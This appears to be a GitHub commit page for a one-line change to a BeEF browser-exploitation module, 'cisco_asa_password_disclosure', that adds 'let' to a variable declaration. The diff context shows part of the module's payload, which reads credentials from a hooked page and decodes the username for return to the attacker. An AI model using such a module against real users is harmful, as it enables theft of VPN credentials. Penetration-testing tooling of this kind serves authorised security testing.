Skip to content

Commit f3e3e6b

Browse files
author
Stephen
committed
init 'creds' var
1 parent 312e397 commit f3e3e6b

File tree

1 file changed

+1
-1
lines changed
  • modules/browser/hooked_domain/cisco_asa_password_disclosure

1 file changed

+1
-1
lines changed

Diff for: modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js

+1-1
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ beef.execute(function() {
1414

1515
if (typeof getcredentials === "function") {
1616
setTimeout(function () {
17-
creds = getcredentials();
17+
let creds = getcredentials();
1818
var result = [];
1919
result.push({
2020
"username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),

0 commit comments

Comments
 (0)